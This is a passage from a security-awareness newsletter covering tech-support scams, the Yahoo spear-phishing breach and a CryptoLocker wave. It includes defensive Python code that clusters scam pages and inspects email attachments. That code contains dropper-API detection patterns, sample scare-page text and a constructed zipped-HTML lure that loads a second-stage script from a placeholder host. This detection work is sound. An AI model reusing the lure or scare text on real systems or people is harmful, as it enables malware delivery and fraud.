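        "<html><body><p>Error code 0x80070057. Malware detected. Your system is "
        "blocked. Call Microsoft certified technicians at (800) 555-0101.</p></body></html>",
    "http://another-alert.example/":
        "<html><body><p>Spyware found! Call support number 800.555.0199</p>"
        "<p>virus removal</p></body></html>",
    "http://bakery.example/contact":
        "<html><body><p>Order cakes by phone: (555) 555-0123. We are open "
        "Mon-Sat.</p></body></html>",
}

if __name__ == "__main__":
    for phone, urls in cluster_by_phone(SAMPLE_PAGES).items():
        print(phone, "->", len(urls), "scam URLs:", urls)
```

Run on the sample corpus, the two scare pages that print the same number in different formats land in one cluster, the bakery page is ignored because it has a phone number but no scare wording, and the cluster keyed by phone number is what you would hand to the VoIP provider or use to block the page family rather than one domain at a time.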

The researchers also phoned 60 scam telephone numbers to log the social engineering tactics – aka trickery – used by scammers. The researchers found that on average, scammers waited until 17 minutes of a call elapsed before offering their services in exchange for money. Most would offer support packages that ranged from a one-time fix to multi-year support, with costs ranging from $69.99 to $999.99. Scammers would typically offer multiple options, then try to persuade victims to pick the middle-priced one, the researchers found.

Freelance attacks appear to be rare. “Through the process of interacting with 60 different scammers, we are now convinced that most, if not all, scammers are part of organized call centers,” the researchers write.

Fake Support is Lucrative

These attacks are relatively easy to launch, inexpensive to run, potentially very lucrative and show no signs of stopping.

Peter Kruse, head of the security group at Danish IT-security firm CSIS, this week warned via Twitter that multiple websites were pretending to be related to the technical support group from Czech anti-virus software developer Avast and urging individuals to call one of the listed phone numbers.

Needless to say, these numbers don’t lead to Avast, which develops free security software that’s used by many consumers. Instead, the numbers go to call centers tied to fraudsters. Avast has repeatedly warned that this is a well-worn scam, with attackers often claiming to be connected to Avast, Dell, Microsoft, Symantec or other technology firms.

Advice for Victims

There’s no way to prevent criminals from running these types of scams.

But law enforcement and consumer rights groups have long urged victims to file a report, even if they didn’t suffer any financial damage as a result.

For anyone targeted by the “yes” scam, the FCC recommends immediately reporting the incident to the Better Business Bureau’s Scam Tracker and to the FCC Consumer Help Center. The FCC’s site also offers advice on tools for blocking robocalls, texts and marketing calls.

 

Anyone who thinks they may have been the victim of phone scammers, for example, by paying for fake tech support, can file a fraud report with their credit card company.

Authorities also recommend they report the attempt to relevant authorities, such as the FBI’s Internet Crime Complaint Center (IC3) or the U.K.’s Action Fraud. Law enforcement agencies use these reports as a form of crowdsourcing, helping them secure funding to battle these types of scams, as well as take them down.

 

Provided by Data Breach Today


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


A Single Spear Phishing Click Caused The Yahoo Data Breach

A single click was all it took to launch one of the biggest data breaches ever.

One mistaken click. That’s all it took for a Canadian hacker aligned with rogue Russian FSB spies to gain access to Yahoo’s network and potentially the email messages and private information of as many as 1.5 billion people.

The U.S. Federal Bureau of Investigation had been investigating the intrusion for two years, but it was only in late 2016 that the full scale of the hack became apparent. On Wednesday, the U.S. Justice Department announced the indictment of four people for the attack, two of whom are rogue FSB officers working in the very division that is supposed to cooperate with the FBI on cybercrime investigations. (The FSB is the successor to the KGB.)

Kremlin Intelligence Services Overlap With Russian Cybercrime Underworld

One of these two rogues, Dmitry Dokuchaev, was himself recently arrested on what the Moscow press calls “treason” charges for passing information to the CIA. In reality, Dokuchaev started out as a criminal hacker who moved to the FSB but never stopped his old tricks. He was just one of the many criminals working inside Russia’s intelligence bureaucracy, and for personal profit he sold information to intermediaries that ultimately found its way to the CIA.

The investigation exposed rivalries inside the Kremlin intelligence establishment as well as inside the Russian cybercrime underworld with which it overlaps. Dokuchaev was part of the Shaltai-Boltai, a hacker group that exploits stolen data to embarrass and blackmail Russian politicians and business officials.

Here’s how the FBI says they did it:

The hack began with a spear-phishing email sent in early 2014 to a Yahoo employee. It is unclear how many employees were targeted or how many emails were sent, but it only takes one person to click on a link, and that is what happened. It is hard to understand why Yahoo did not sufficiently step its employees through new-school security awareness training to prevent a disaster like this.

It was all over the press, but CSO had the best story about it, with more detail, background and even video:

http://www.csoonline.com/article/3180762/data-breach/inside-the-russian-hack-of-yahoo-how-they-did-it.html


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


[ALERT] New Massive Wave Of CryptoLocker Ransomware Infections

We all thought that evil genius Evgeniy Bogachev had retired to the Black Sea with his tens of millions of ill-gotten gains after he became the FBI’s #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.

CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.

For people new to the ransomware racket: Russian cybercrime gangs tend to test and debug their campaigns in Europe, then attack America in full force. CryptoLocker is ransomware’s still very potent granddaddy. It pioneered this highly successful criminal business model in September 2013, and hundreds of copycats followed.

In a blog post, our friend Larry Abrams from BleepingComputer wrote that the strain (also known as TorrentLocker and Teerac) started its comeback toward the end of January 2017, after being quiet in the second half of 2016.

Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumping from just a handful to nearly 100 per day, and then to more than 400 per day by February.

 

He also confirmed CryptoLocker’s recent tsunami with Microsoft’s Malware Protection Center, whose telemetry picked up increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but that is just social engineering to trick the recipient into opening attached .JS files that download and install CryptoLocker.

Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. “The HTML contains a JS file, which pulls a second JS file from an Amazon server, which executes the first one in memory,” said Lotem Finklesteen, threat intelligence researcher at Check Point.

“Then, after pulling two more JS files, CryptoLocker is served to the victim machine and being executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany,” said Finklesteen.
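The chain Check Point describes (zip attachment, HTML inside it, inline script that pulls a second script from a cloud host and runs it in memory, more stages, then the payload) is what a mail gateway can catch before a user ever opens the file, because every stage up to the download is visible in the attachment itself. The following is an added example, not Check Point’s, Microsoft’s or this blog’s code, of such a check: it parses a message, opens archive attachments in memory, and reports HTML or JavaScript members that contain script, fetch code from an external host, or call the Windows script host objects droppers rely on. The lure message is constructed inline, and the download hostname in it is a placeholder that stands in for the Amazon-hosted server, not a real indicator.

```python
"""Added example: gateway-side inspection of a zipped-HTML lure.
Not Check Point's code. The sample message below is constructed, and the
hostname in it is a placeholder, not an indicator of compromise."""
import io
import re
import zipfile
from email import message_from_bytes
from email.message import EmailMessage

SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)
INLINE_SCRIPT = re.compile(r"<script\b", re.I)
URL_IN_JS = re.compile(r"https?://[^\s\"')]+", re.I)
# Objects a JScript/HTML dropper needs to fetch and run a payload on Windows.
DROPPER_APIS = re.compile(r"\b(ActiveXObject|WScript\.Shell|MSXML2\.XMLHTTP|ADODB\.Stream|eval)\b")
RISKY_EXT = (".html", ".htm", ".js", ".jse", ".wsf", ".hta")
MAX_MEMBER_BYTES = 5_000_000  # cap so a zip bomb cannot exhaust the gateway


def inspect_member(name, data):
    """Return a list of findings for one file (archive member or bare attachment)."""
    findings = []
    lower = name.lower()
    if not lower.endswith(RISKY_EXT):
        return findings
    text = data.decode("utf-8", errors="replace")
    if lower.endswith((".html", ".htm")) and INLINE_SCRIPT.search(text):
        findings.append("html-with-script")
    for url in SCRIPT_SRC.findall(text) + URL_IN_JS.findall(text):
        findings.append("remote-script:" + url)  # stage-2 fetch, the pivot worth blocking
    if DROPPER_APIS.search(text):
        findings.append("dropper-api")
    return findings


def inspect_message(raw):
    """Return {attachment name: [findings]} for a raw RFC 822 message.
    Zip attachments are opened in memory and never written to disk."""
    msg = message_from_bytes(raw)
    report = {}
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        fname = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        if fname.lower().endswith(".zip"):
            try:
                with zipfile.ZipFile(io.BytesIO(payload)) as zf:
                    for info in zf.infolist():
                        if info.file_size > MAX_MEMBER_BYTES:
                            report.setdefault(fname, []).append("oversized-member:" + info.filename)
                            continue
                        for finding in inspect_member(info.filename, zf.read(info)):
                            report.setdefault(fname, []).append(info.filename + ":" + finding)
            except zipfile.BadZipFile:
                report.setdefault(fname, []).append("corrupt-zip")
        else:
            for finding in inspect_member(fname, payload):
                report.setdefault(fname, []).append(finding)
    return report


def build_sample_message():
    """Constructed lure shaped like the chain above: a zip holding an HTML file
    whose inline script loads a second script from a remote host. Placeholder host."""
    html = (
        "<html><body>Your invoice is attached.<script>"
        "var s=document.createElement('script');"
        "s.src='https://cloud-host.example/stage2.js';"  # placeholder, not a real indicator
        "document.body.appendChild(s);</script></body></html>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_2017.html", html)
    msg = EmailMessage()
    msg["From"] = "billing@sender.example"
    msg["To"] = "victim@corp.example"
    msg["Subject"] = "Invoice"
    msg.set_content("Please see attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="invoice_2017.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in inspect_message(build_sample_message()).items():
        print(name)
        for finding in findings:
            print("  ", finding)
```

On the constructed lure the report shows the HTML member both carrying inline script and reaching out to a remote host for a second stage; either finding alone is reason to quarantine a zipped HTML attachment, since legitimate invoices do not arrive as script-bearing HTML inside archives. The size cap and the in-memory unzip are there because the inspector itself runs in the mail path and must not be the thing an attacker can crash.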

Ransomware as a global threat

Microsoft’s Malware Protection Center blog stated: “Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters.” Here is their geographic distribution chart.

[Chart: geographic distribution of ransomware encounters in 2016, Microsoft Malware Protection Center]


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News
